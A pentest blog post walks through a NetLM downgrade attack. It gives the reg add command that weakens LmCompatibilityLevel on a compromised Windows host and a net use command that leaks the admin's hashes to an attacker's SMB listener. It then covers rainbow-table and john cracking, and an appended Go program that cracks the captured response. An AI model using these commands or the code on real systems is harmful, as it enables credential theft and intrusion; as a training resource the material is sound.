
Post Exploitation Using NetNTLM Downgrade Attacks

October 04, 2012

I love to pass the hash and steal tokens as much as the next pentester, but sometimes it’s nice to have the actual password for a user. Here are some cases where having the password, instead of just the hash, is helpful:

  • Web Based VPN Login
  • GUI Access
  • Third Party AD Integrated Management Tools
  • Database Authentication
  • Passwords Shared Across Multiple Systems (Unix/Linux, Network Gear, etc)

The easiest way to go from SYSTEM on a box to dumping the cleartext passwords of the logged-on users is Hernan Ochoa's Windows Credential Editor (WCE), which pulls them out of the Windows Digest Authentication (wdigest) package. It's as simple as running "wce -w". If you haven't checked out WCE, go do that now, play with it on a lab box, and come back to this post. I can wait…

Okay, now that you’re back (or already familiar with WCE), I’d like to discuss a technique that I’m calling a NetLM downgrade attack.

Here’s the scenario

We’ve exploited a box and have a meterpreter shell running as SYSTEM. We decide that we want to tread as lightly as possible to prevent detection and minimize the forensic evidence we leave behind, so we prefer not to upload any binaries (like WCE), or disable AV or whatever. There is an administrator, Joe Admin (jadmin), that is logged in to our pwned box, so we can steal his token. Win!

Figure 1: Stealing a token from a process running as user jadmin

We’d like to crack Joe’s password, since we think he may have re-used it on the company’s Unix servers. But, what hashes do we want to use?

We can dump the domain cached credentials (MSCACHE, or "mscash") of the logged-on users with cachedump and attempt to crack those, but sufficiently long and complex passwords can take a LONG time to crack in the mscash format. We want hashes that are crackable within a reasonable amount of time, like over a lunch break.

Perhaps we could get the raw LM hash? That's more difficult than it sounds, since LM hash storage is disabled on the domain. Plus, since Joe's account is a domain account, we'd have to dump it directly from a domain controller. And even if we were targeting a local account, enabling LM hash storage through group policy doesn't take effect until the next time the user changes his password. How about NetLM?

NetLM and Group Policy

If you’ve encountered NetLM hashes before on a pentest, perhaps via NBNS spoofing (thanks Tim!), you know that they are easy to crack assuming you control the challenge that’s sent, which can be done with the auxiliary/server/capture/smb Metasploit module.

The issue for us, as attackers, is that on modern systems and in many Windows domains NetLM is likely to be disabled, and NetNTLM (much harder to crack) enforced through group policy. In fact there are 6 options that can be configured in group policy. They’re ordered from lowest to highest security, which also happens to be highest to lowest levels of backwards compatibility with older systems.

Here’s what that looks like in the gpedit.msc on a Windows XP box:

Figure 2: Group policy options for LAN Manager Authentication Level

If any option other than the first two is selected, our pwned box is not going to send us a NetLM response. Here's what we get if we set up an SMB listener (auxiliary/server/capture/smb) in Metasploit with the third option, "Send NTLM response only", enforced:

Figure 3: We start our SMB listener

Figure 4: In our meterpreter session, we drop to a shell as user jadmin and connect to our SMB listener

net use \\<listener IP>\admin$ /user:<domain>\<user>

Figure 5: Our SMB listener receives the connection, but no NetLM hash arrives because NetLM is disabled

Now we have a NetNTLM hash, but that's hard to crack. What happens if we change the group policy setting to enable NetLM? Does it take effect right away? It turns out that it does.

Unlike enabling LM hash storage on a machine through group policy, which only takes effect at the next password change, a group policy change that enables NetLM takes effect immediately, with no further action required. This is great for us in this scenario, since it lets us downgrade the authentication level to NetLM, which (again) is MUCH easier to crack. (Note that Windows Vista, Server 2008 and later default to "Send NTLMv2 response only", so on those systems this downgrade is what makes an LM response appear at all.)

Security options like this one are simply registry values that group policy sets, so we can enable NetLM from the command line with the reg command. We'll get to that in a moment. First, though, we need to figure out which registry value corresponds to the LAN Manager Authentication Level policy.

Group policy & the registry

Let’s fire up process monitor in a VM and find the corresponding registry key as we change the policy.

Figure 6: Using Process Monitor to determine the registry key for NetLM authentication

This key looks interesting: HKLM\SYSTEM\CurrentControlSet\Control\Lsa, value LmCompatibilityLevel.

Let's take a look in regedit:

Figure 7: The LmCompatibilityLevel registry value

Looks like it's currently set to 2. After some trial and error, we find that the values 0 through 5 map directly, in order, onto the six group policy options.

Figure 8: Meaning of the values in the LmCompatibilityLevel key (numbers added)

  • 0: Send LM & NTLM responses
  • 1: Send LM & NTLM (use NTLMv2 session security if negotiated)
  • 2: Send NTLM response only
  • 3: Send NTLMv2 response only
  • 4: Send NTLMv2 response only, refuse LM
  • 5: Send NTLMv2 response only, refuse LM & NTLM

Enabling NetLM via the command line

Now that we know which value we want to change and what to set it to (0, "Send LM & NTLM responses"), we make a note of the current value (don't forget to set it back when you're done!) and then change it with either meterpreter's built-in reg command or the Windows reg command. I'll use the Windows commands from a shell:

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel /t REG_DWORD /d 0 /f

Figure 9: Current value of LmCompatibilityLevel is 2

Figure 10: Changing the LmCompatibilityLevel value to 0

Figure 11: LmCompatibilityLevel value is now 0

The policy change is immediately enforced, so we should be all set to capture the NetLM hash. Let’s just execute that net use command again:

net use \\<listener IP>\admin$ /user:<domain>\<user>

Figure 12: Connecting to the SMB listener from the exploited box

Figure 13: Captured both NetLM and NetNTLM hashes

Cracking the NetLM Hash

I’ll go through the process briefly below. If you want a more in-depth write-up on NetLM hash cracking, check out:

Earlier you may have noticed that we set the module's JOHNPWFILE option to /tmp/john. Metasploit writes the captures in john's input format for us, so the file we want is /tmp/john_netntlm.

Figure 14: Metasploit's auxiliary/server/capture/smb john output

The first 16 hex characters (8 bytes) of the NetLM response, highlighted in green in Figure 14, are the first DES block of the LM challenge response, and they depend only on the first 7 characters of the password. When the challenge is known they can be cracked with pre-generated rainbow tables. The rest of the password can then be cracked using john; the easiest way is the netntlm.pl script that ships with john, located in /pentest/passwords/john on BackTrack.

So, cracking a NetLM hash is a 2 step process:

     1. Crack the first 7 characters of the password using rainbow tables
     2. Crack the remaining characters, and then recover the case, using john the ripper's netntlm.pl script

Cracking the first 7 characters using rainbowtables

Since the auxiliary/server/capture/smb module uses a static challenge of 1122334455667788 by default, we can use pre-generated rainbow tables built for that challenge to crack the first 7 characters of the NetLM password. The tables are available here, in RTI2 format:

rcracki_mt can be downloaded here:

Figure 15: Cracking the hash using rcracki_mt

Figure 16: The first half of the admin's password

We’ve found the first 7 characters of Joe Admin’s password, H@RD2CR, using rainbowtables. It took all of 5 minutes on my laptop.

Note that LM hashes are computed over the uppercased password, so the case is lost and for now the prefix is shown in uppercase. In a moment, john will use the case-insensitive LM password to recover the case-sensitive password from the NTLM portion of the challenge response.

Cracking the rest of the password with john

First, we pass the first half of the password as the seed to netntlm.pl, which uses it to crack the rest of the (uppercase) LM password. Then we run the script again with no seed so that it recovers the case-sensitive password from the NTLM response.

./netntlm.pl --seed "H@RD2CR" --file /tmp/john_netntlm

./netntlm.pl --file /tmp/john_netntlm

Figure 17: We've cracked the 11 character password, but it's still shown in all uppercase

Figure 18: Running the script again, we find that the password is "H@rd2Cr4ck?"

Depending on the length of the password, whether you’re using a gpu, and what rules are passed to john, this could take a little while. However, since LM is cryptographically flawed and we’re only cracking the second half of the password, this will be relatively fast for most passwords. In this case, the password, “H@rd2Cr4ck?” was 11 characters and it took just under an hour.
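To show why the two steps above are enough, here is a worked example written for this edit; it is not code from the original post, from Metasploit, from rcracki_mt or from john. It builds the LM hash and the NetLM (LMv1) response with the Go standard library's DES, then parses a capture line in the user::domain:LMresp:NTresp:challenge layout that JOHNPWFILE writes and cracks it in the same two steps: a table lookup on the first 8 response bytes (a three-entry candidate list stands in for the rainbow table), then a seeded search of the remaining characters against the next 8 bytes. The capture line, the domain name CORP and the reduced search alphabet are constructed for the demo, and the NT response field is zero-filled because MD4 is not in Go's standard library, so the final case-recovery pass (john's second netntlm.pl run) is not reproduced.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

const StaticChallenge = "1122334455667788" // default challenge of capture/smb

var lmMagic = []byte("KGS!@#$%")

// desBlock encrypts one 8-byte block under a 7-byte key chunk, first spread over
// an 8-byte DES key with an (ignored) parity bit per byte, as LM/NTLMv1 do.
func desBlock(k7, block []byte) []byte {
	k := make([]byte, 8)
	k[0], k[7] = k7[0]&0xfe, (k7[6]<<1)&0xfe
	for i := 1; i < 7; i++ {
		k[i] = (k7[i-1]<<(8-i) | k7[i]>>i) & 0xfe
	}
	c, _ := des.NewCipher(k) // k is always 8 bytes, so NewCipher cannot fail
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// LMHash: uppercase, pad/truncate to 14 bytes, DES-encrypt the magic block under
// each 7-byte half; each half of the hash depends only on its half of the password.
func LMHash(password string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password))
	return append(desBlock(p[:7], lmMagic), desBlock(p[7:], lmMagic)...)
}

// LMResponse is the 24-byte NetLM (LMv1) response: the hash padded to 21 bytes
// yields three 7-byte DES keys, each encrypting the 8-byte server challenge.
func LMResponse(password string, challenge []byte) []byte {
	h, resp := append(LMHash(password), make([]byte, 5)...), []byte{}
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(h[i:i+7], challenge)...)
	}
	return resp
}

// FirstHalf stands in for the rainbow-table lookup: with the challenge fixed, response
// bytes 0-7 depend on characters 1-7 alone, so a table maps them back to the prefix.
func FirstHalf(lmResp, challenge []byte, table []string) (string, bool) {
	for _, cand := range table {
		if bytes.Equal(desBlock(LMHash(cand)[:7], challenge), lmResp[:8]) {
			return strings.ToUpper(cand), true
		}
	}
	return "", false
}

// SecondHalf is the seeded step (netntlm.pl --seed): with characters 1-7 known, bytes
// 8-15 depend only on characters 8-14, so enumerate those (rightmost fastest) to a match.
func SecondHalf(lmResp, challenge []byte, prefix, alphabet string, maxLen int) (string, bool) {
	first, n := LMHash(prefix), len(alphabet)
	for l, total := 1, n; l <= maxLen && l <= 7; l, total = l+1, total*n {
		for v := 0; v < total; v++ {
			p2 := make([]byte, 7)
			for i, x := l-1, v; i >= 0; i, x = i-1, x/n {
				p2[i] = alphabet[x%n]
			}
			// DES key chunk 2 = hash bytes 7-13: byte 7 is fixed by the prefix,
			// bytes 8-13 come from the candidate second half alone.
			key := append([]byte{first[7]}, desBlock(p2, lmMagic)[:6]...)
			if bytes.Equal(desBlock(key, challenge), lmResp[8:16]) {
				return string(p2[:l]), true
			}
		}
	}
	return "", false
}

// Crack takes one JOHNPWFILE line (user::domain:LMresp:NTresp:challenge), runs both
// steps and checks the result against the whole LM response; the NT field is not read.
func Crack(line string, table []string, alphabet string, maxLen int) (string, error) {
	f := strings.Split(strings.TrimSpace(line), ":")
	if len(f) != 6 {
		return "", fmt.Errorf("want 6 colon-separated fields, got %d", len(f))
	}
	lm, e1 := hex.DecodeString(f[3])
	ch, e2 := hex.DecodeString(f[5])
	if e1 != nil || e2 != nil || len(lm) != 24 || len(ch) != 8 {
		return "", fmt.Errorf("malformed hex in %q", line)
	}
	pre, ok := FirstHalf(lm, ch, table)
	if !ok {
		return "", fmt.Errorf("prefix not in table")
	}
	suf, ok := SecondHalf(lm, ch, pre, alphabet, maxLen)
	if !ok || !bytes.Equal(LMResponse(pre+suf, ch), lm) {
		return "", fmt.Errorf("suffix not found")
	}
	return pre + suf, nil
}

// SampleLine is a constructed capture of the post's password: domain CORP is made up
// and the NT response is zero-filled (MD4 is not in Go's standard library).
func SampleLine() string {
	ch, _ := hex.DecodeString(StaticChallenge)
	return "jadmin::CORP:" + hex.EncodeToString(LMResponse("H@rd2Cr4ck?", ch)) + ":" + strings.Repeat("0", 48) + ":" + StaticChallenge
}

func main() {
	pw, err := Crack(SampleLine(), []string{"PASSW0R", "LETMEIN", "H@RD2CR"}, "0123456789?ABCDEFGHIJKLMNOPQRSTUVWXYZ", 4)
	fmt.Println(pw, err) // H@RD2CR4CK? <nil>
}
```

The property the whole attack rests on is visible in LMResponse: DES key chunk 1 is hash bytes 0-6 and chunk 2 is hash bytes 7-13, and the two hash halves never mix, so for a fixed challenge the first 8 response bytes can be tabulated once per 7-character prefix, and the next 8 can be searched independently once that prefix is known. The same split is why changing the challenge (or refusing LM responses altogether) defeats the rainbow tables.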

